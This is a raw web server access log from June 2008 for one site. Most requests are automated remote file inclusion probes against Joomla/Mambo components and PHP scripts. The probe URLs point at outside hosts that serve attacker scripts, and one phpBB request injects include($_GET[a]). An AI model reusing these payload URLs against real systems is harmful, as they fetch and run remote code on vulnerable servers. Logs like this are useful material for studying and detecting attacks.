74.6.18.228 - - [17/Jun/2008:12:21:41 -0700] "GET /logs/access_080526.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:12:21:57 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:12:22:03 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:12:22:03 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:12:22:03 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:12:22:10 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:12:22:10 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:12:22:10 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.55.179.18 - - [17/Jun/2008:12:22:19 -0700] "GET /logs/guestbook//admin.php?include_path=http://www.fc13.fr/ultrastats/include/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.179.18 - - [17/Jun/2008:12:22:19 -0700] "GET /guestbook//admin.php?include_path=http://www.fc13.fr/ultrastats/include/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:12:22:22 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:12:22:22 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:12:22:22 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:12:22:42 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:12:22:42 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:12:22:42 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:23:26 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:23:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:23:31 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 200 18565 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:23:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:23:32 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:24:06 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:24:06 -0700] "GET /index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:12:24:10 -0700] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:24:14 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:24:22 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.233.187.225 - - [17/Jun/2008:12:24:22 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:24:22 -0700] "GET /index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:24:22 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.233.187.225 - - [17/Jun/2008:12:24:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:12:24:24 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:12:24:32 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.233.187.225 - - [17/Jun/2008:12:24:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:25:10 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:25:11 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:25:11 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:25:12 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
211.236.177.197 - - [17/Jun/2008:12:25:13 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:25:14 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:25:45 -0700] "GET /logs/access_080507.log//language.inc.php?langs_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:12:25:53 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:12:26:16 -0700] "GET /logs/access_080126.log//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.253.213.4 - - [17/Jun/2008:12:26:17 -0700] "GET //login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.253.213.4 - - [17/Jun/2008:12:26:17 -0700] "GET /logs//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:26:20 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:26:20 -0700] "GET /index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:26:20 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:12:26:23 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.20 - - [17/Jun/2008:12:26:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.20 - - [17/Jun/2008:12:26:36 -0700] "GET /logs/access_080510.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:26:51 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:26:51 -0700] "GET /index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:27:00 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:27:03 -0700] "GET /index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:27:03 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:27:04 -0700] "GET /logs/access_080211.log/test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:27:05 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:27:05 -0700] "GET /test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:27:05 -0700] "GET /logs/test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:27:28 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 200 18549 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:12:27:52 -0700] "GET /?show=gallery&pageid=17 HTTP/1.1" 200 54301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
65.55.211.30 - - [17/Jun/2008:12:28:05 -0700] "GET /minamijewelry/source_images/updated1/?M=D HTTP/1.1" 200 1443 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:12:28:08 -0700] "GET /logs/access_080110.log//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:12:28:08 -0700] "GET //login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:12:28:09 -0700] "GET /logs//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:28:25 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:28:36 -0700] "GET /logs/access_080117.log/test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:29:02 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:29:03 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:12:30:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:12:30:57 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:12:31:03 -0700] "GET /logs//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:12:31:04 -0700] "GET //login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:32:05 -0700] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:32:06 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:32:06 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
66.132.151.8 - - [17/Jun/2008:12:32:12 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.132.151.8 - - [17/Jun/2008:12:32:12 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:12:32:17 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:12:32:18 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:12:32:21 -0700] "GET /logs/access.log/index.php?x=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.76.116.20 - - [17/Jun/2008:12:32:22 -0700] "GET /logs/access_080312.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:12:32:22 -0700] "GET /logs/index.php?x=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:32:26 -0700] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:12:32:26 -0700] "GET /index.php?x=http://skill-station.net/help/id5.txt??? HTTP/1.1" 200 18401 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:12:32:49 -0700] "GET //include/write.php?dir=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:12:33:03 -0700] "GET /logs//include/write.php?dir=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.195.37.180 - - [17/Jun/2008:12:33:09 -0700] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:10 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:11 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:11 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:11 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:11 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:12 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:16 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:33:17 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:22 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:23 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:26 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:32 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:33:37 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
